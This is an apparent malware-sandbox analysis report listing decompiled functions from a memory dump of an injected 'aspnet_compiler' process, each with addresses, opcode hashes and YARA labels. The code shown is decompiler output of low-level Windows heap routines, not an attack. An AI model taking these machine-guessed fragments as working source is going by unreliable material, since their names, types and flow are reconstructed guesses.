				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				void* _t18;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x197d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(L018A7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				return L018CB640(E018C9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25,  *_t12 & 0x000000ff);
			}













                                                  0x01958d34
                                                  0x01958d43
                                                  0x01958d4b
                                                  0x01958d4e
                                                  0x01958d52
                                                  0x01958d5c
                                                  0x01958d6e
                                                  0x01958d5e
                                                  0x01958d67
                                                  0x01958d67
                                                  0x01958d79
                                                  0x01958d7a
                                                  0x01958d7c
                                                  0x01958d94

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e70b7b4c94bbd6cc9a2d42cb8fe6d32e217d45e5fd8ac574d5f9d12631b83b86
                                                  • Instruction ID: d809d579520cab539d967d53e83202fb80045c9b998b654301f8b07a14e32c21
                                                  • Opcode Fuzzy Hash: e70b7b4c94bbd6cc9a2d42cb8fe6d32e217d45e5fd8ac574d5f9d12631b83b86
                                                  • Instruction Fuzzy Hash: E4F09A70A04608AFDB14EBADD442A6EB7B8AF18700F508099E905EB280EA34DA008B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01942073 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E01942073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0193FD22(__ecx);
				_t19 =  *0x197849c - _t3; // 0x750c51e3
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1978748; // 0x0
					if(__eflags <= 0) {
						L01941C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1978724 & 0x00000004;
							if(( *0x1978724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1978724; // 0x0
					return E01938DF1(__ebx, 0xc0000374, 0x1975890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                  0x01942076
                                                  0x01942078
                                                  0x0194207d
                                                  0x01942083
                                                  0x019420a4
                                                  0x019420aa
                                                  0x019420ac
                                                  0x019420b7
                                                  0x019420ba
                                                  0x019420bc
                                                  0x019420c9
                                                  0x019420c9
                                                  0x019420d0
                                                  0x019420d2
                                                  0x00000000
                                                  0x019420d2
                                                  0x019420be
                                                  0x019420c3
                                                  0x019420c5
                                                  0x019420c7
                                                  0x00000000
                                                  0x00000000
                                                  0x019420c7
                                                  0x019420bc
                                                  0x019420d4
                                                  0x01942085
                                                  0x01942085
                                                  0x019420a3
                                                  0x019420a3

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0edda6b5b252fd5949b725859922eaad064b5dfd034e3d9b84430fa2127bae19
                                                  • Instruction ID: 63ffa1f8df699a23f770c31989d116385f9607fdeb0eaa0f0b1ccaacc4dc810a
                                                  • Opcode Fuzzy Hash: 0edda6b5b252fd5949b725859922eaad064b5dfd034e3d9b84430fa2127bae19
                                                  • Instruction Fuzzy Hash: 35F0552A83A2854BDF336F2C3009BE1BFDAEFD5111F0A0485F4AC17209C5388883CB24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C927A Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E018C927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L018A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E018CFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E018C92C6(_t11, _t14);
				}
				return _t11;
			}





                                                  0x018c9295
                                                  0x018c9299
                                                  0x018c929f
                                                  0x018c92aa
                                                  0x018c92ad
                                                  0x018c92ae
                                                  0x018c92af
                                                  0x018c92b0
                                                  0x018c92b4
                                                  0x018c92bb
                                                  0x018c92bb
                                                  0x018c92c5

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                  • Instruction ID: 3a1ee4bc8fb842a021ddc0721991370e93d8ba7511160060b0e9964af9360922
                                                  • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                  • Instruction Fuzzy Hash: CBE0E5326405016BF7119E0ECC80F03775A9F92B24F04407CF5009E242C6F5DA0887A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01958B58 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 62%
                                                  			E01958B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				void* _t17;
				void* _t22;
				void* _t23;
				void* _t24;
				signed int _t25;

				_v8 =  *0x197d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(L018A7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				return L018CB640(E018C9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24,  *_t11 & 0x000000ff);
			}













                                                  0x01958b67
                                                  0x01958b6f
                                                  0x01958b72
                                                  0x01958b7d
                                                  0x01958b8f
                                                  0x01958b7f
                                                  0x01958b88
                                                  0x01958b88
                                                  0x01958b9a
                                                  0x01958b9b
                                                  0x01958b9d
                                                  0x01958bb5

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b72749692bd21f6cfbb80d977a0595826929a0959b363f340e91aadcb150c6cf
                                                  • Instruction ID: b558360e525fb484e4f52f3766cc7b3f0a23a635c93904d26d6e8f6d81c3aefb
                                                  • Opcode Fuzzy Hash: b72749692bd21f6cfbb80d977a0595826929a0959b363f340e91aadcb150c6cf
                                                  • Instruction Fuzzy Hash: CFF082B0A04259ABDB14EBADD906E7E77B8EF04704F440499BA05EB381EA34DA00C795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0188F358 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 79%
                                                  			E0188F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E018BF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L018A4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                  0x0188f35d
                                                  0x0188f361
                                                  0x0188f367
                                                  0x0188f372
                                                  0x0188f38c
                                                  0x0188f38c
                                                  0x0188f394

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                  • Instruction ID: 0b1add1a8fa10a6f23923bff048097ebbfffd837a39122c66debf011adfa24cc
                                                  • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                  • Instruction Fuzzy Hash: D2E0DF32A41118FBEB31AADD9E05FAABFACDB58B60F040195BB04D7150D9609F00C3D1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019141E8 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 82%
                                                  			E019141E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x19608f0);
				_t5 = E018DD08C(__ebx, __edi, __esi);
				if( *0x19787ec == 0) {
					L0189EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x19787ec == 0) {
						 *0x19787f0 = 0x19787ec;
						 *0x19787ec = 0x19787ec;
						 *0x19787e8 = 0x19787e4;
						 *0x19787e4 = 0x19787e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01914248();
				}
				return E018DD0D1(_t5);
			}





                                                  0x019141e8
                                                  0x019141ea
                                                  0x019141ef
                                                  0x019141fb
                                                  0x01914206
                                                  0x0191420b
                                                  0x01914216
                                                  0x0191421d
                                                  0x01914222
                                                  0x0191422c
                                                  0x01914231
                                                  0x01914231
                                                  0x01914236
                                                  0x0191423d
                                                  0x0191423d
                                                  0x01914247

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 06761e9c46a2f0c49953ae599e3ebb0b2579d6734ac8b5736e4f4d46c5f49fa5
                                                  • Instruction ID: 0fcb04b73789dccdf6a1b5a2e597279e8e6b8378fdf564c1036bcb7d533c27ea
                                                  • Opcode Fuzzy Hash: 06761e9c46a2f0c49953ae599e3ebb0b2579d6734ac8b5736e4f4d46c5f49fa5
                                                  • Instruction Fuzzy Hash: F9F01574914705CECBB1EFA99508758B7E8FB98B21F00451A900A87A8CC77449A1CF02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0193D380 Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0193D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0188E8B0(__ecx, _a4, 0xfff);
					L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                  0x0193d38a
                                                  0x0193d39b
                                                  0x0193d3b1
                                                  0x00000000
                                                  0x0193d3b6
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                  • Instruction ID: b5fae035c09c8a0a36d6f141130fbf475bfaa931b8c5f33d99cea36027c473b5
                                                  • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                  • Instruction Fuzzy Hash: 47E0C231280209BBEB226E88CC00F797B9ADB907A5F504031FE08AA690C6719D91E6C5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018BA185 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E018BA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x19767e4 >= 0xa) {
					if(_t5 < 0x1976800 || _t5 >= 0x1976900) {
						return L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E018A0010(0x19767e0, _t5);
				}
			}





                                                  0x018ba190
                                                  0x018ba1a6
                                                  0x018ba1c2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018ba192
                                                  0x018ba192
                                                  0x018ba19f
                                                  0x018ba19f

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02d85a49fc55bd5fca1b95394dd57187fcc6bdda3102ac8f34dfcb6ccf206f54
                                                  • Instruction ID: e338a3c12fa91bc050be5616a391a741efe3e88d3314a65e4adb96bdc0077b88
                                                  • Opcode Fuzzy Hash: 02d85a49fc55bd5fca1b95394dd57187fcc6bdda3102ac8f34dfcb6ccf206f54
                                                  • Instruction Fuzzy Hash: 1CD02B71160E0067F62D13148894B617756FF80B90F34040CF20BCB690E9508DD4E109
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 019053CA Relevance: .0, Instructions: 16COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E019053CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0189EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                  0x019053ca
                                                  0x019053ce
                                                  0x019053d9
                                                  0x019053de
                                                  0x019053e1
                                                  0x019053e1
                                                  0x019053e6
                                                  0x019053f3
                                                  0x00000000
                                                  0x019053f8
                                                  0x019053fb

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                  • Instruction ID: aa4beb26f8c9e1bdbd183ecbe6772918221d1b8b974f6a7cce355bc10b66d4fc
                                                  • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                  • Instruction Fuzzy Hash: D4E0EC71944684DFEF13DB5DCA90F5EBBF9FB44B40F190454A508AB6A1C665AD00CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B35A1 Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E018B35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0189EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                  0x018b35a1
                                                  0x018b35a1
                                                  0x018b35a5
                                                  0x018b35ab
                                                  0x018b35ab
                                                  0x018b35b5
                                                  0x00000000
                                                  0x018b35c1
                                                  0x018b35b7

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                  • Instruction ID: 0edec50ab758afd6fc9a306545cd7d902c585517b899392cd50a81327863e204
                                                  • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                  • Instruction Fuzzy Hash: D8D0A931401985FEEF02EF18C2987E83BB2BB00308F582065A80286A52E33A4B0AC602
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0189AAB0 Relevance: .0, Instructions: 12COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0189AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                  0x0189aab6
                                                  0x0189aabb
                                                  0x018ea442
                                                  0x00000000
                                                  0x018ea448
                                                  0x018ea454
                                                  0x018ea454
                                                  0x0189aac1
                                                  0x0189aac1
                                                  0x0189aac6
                                                  0x0189aac6

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                  • Instruction ID: 4532955681cd92449545c0c196f8cd43835c02eaee57ce7f11c2ebbf90ed7b0b
                                                  • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                  • Instruction Fuzzy Hash: 34D0E939352980CFD71BDB1DC998B1577F4BB45B44FC50490E501CB762E62CDA44CA00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0190A537 Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0190A537(intOrPtr _a4, intOrPtr _a8) {

				return L018A8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                  0x0190a553

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                  • Instruction ID: def296596f7d546888c7be087dd7e1a8fe39a844097cb31fc6c5bca8ee6e79a4
                                                  • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                  • Instruction Fuzzy Hash: 89C08C33080248FBCB126F85CC00F067F2AFBA4B60F008010FA080B570C632EA70EB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0188DB40 Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0188DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L018A4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                  0x0188db4d
                                                  0x0188db54
                                                  0x0188db5f
                                                  0x0188db56
                                                  0x0188db56
                                                  0x0188db5c
                                                  0x0188db5c

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                  • Instruction ID: 3add74e1e79cdc159c6b7a098b769bf36085dce256af96def1c4acec46fb688a
                                                  • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                  • Instruction Fuzzy Hash: 77C08C30280A41ABFB222F24CD01B003AA0BB10B01F8800A06300DA0F0EBB8DA01E600
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0188AD30 Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0188AD30(intOrPtr _a4) {

				return L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                  0x0188ad49

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                  • Instruction ID: 7c43735d285c3d32d1e2c02cbb525e5f3953e7225b9d8066a084267905a98328
                                                  • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                  • Instruction Fuzzy Hash: F7C08C32080248BBC7126B49CD00F117F29E7A0B60F000020B6044A6618972ED60E588
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018A3A1C Relevance: .0, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E018A3A1C(intOrPtr _a4) {
				void* _t5;

				return L018A4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                  0x018a3a35

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                  • Instruction ID: 5b436897359c52daa31490dbff340b2fccbfc8dc7e041255fb96aa8bce1e8d5c
                                                  • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                  • Instruction Fuzzy Hash: 67C08C32080248BBDB126E45DC00F017B29E7A0B60F040020B6040A5608672ED60D588
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B2ACB Relevance: .0, Instructions: 5COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E018B2ACB() {
				void* _t5;

				return E0189EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                  0x018b2adc

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                  • Instruction ID: cc0a4d499acc741c97c659acb3b9bb69535f47c53388c22cbd19401be5e7a431
                                                  • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                  • Instruction Fuzzy Hash: 20B01232C10441CFCF02EF44C650B197731FB00750F094490900177D30C229AD01CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C99D0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0e8d24b8a7ad2f8644fa531632ed159443617be162e735731447700f18cf56e
                                                  • Instruction ID: 7f3290fe68e7c6479279314a71015cf0b27e8ae2abbcbfadcb62a16d3b64e298
                                                  • Opcode Fuzzy Hash: a0e8d24b8a7ad2f8644fa531632ed159443617be162e735731447700f18cf56e
                                                  • Instruction Fuzzy Hash: 349002A125110042D104619944047060145A7E1341F51C112A3148668CC5698D656165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C95F0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99cc18ec3706bd31636268a79eada9e89255be89f5fd9f5a34ecb58857655b02
                                                  • Instruction ID: 6f1c3495f443ee3731021d74b1c0b420bd4c0f2603c7351e890d299ef3d27470
                                                  • Opcode Fuzzy Hash: 99cc18ec3706bd31636268a79eada9e89255be89f5fd9f5a34ecb58857655b02
                                                  • Instruction Fuzzy Hash: 3190027124110802D104619948046860105A7D0341F51C111A7018769ED6A589957171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018C9520 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c0e87fb2038c4e5a7036a86f94bb504391bfad0979857b3c00f4d227be928c8
                                                  • Instruction ID: e01dd9f26c73a41251af73c39397a03eabccccdcf1e3e90cf4afab56a31d8478
                                                  • Opcode Fuzzy Hash: 0c0e87fb2038c4e5a7036a86f94bb504391bfad0979857b3c00f4d227be928c8
                                                  • Instruction Fuzzy Hash: B69002E1241240924500A2998404B0A4605A7E0341F51C116E2048674CC5658955A175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018CAD30 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
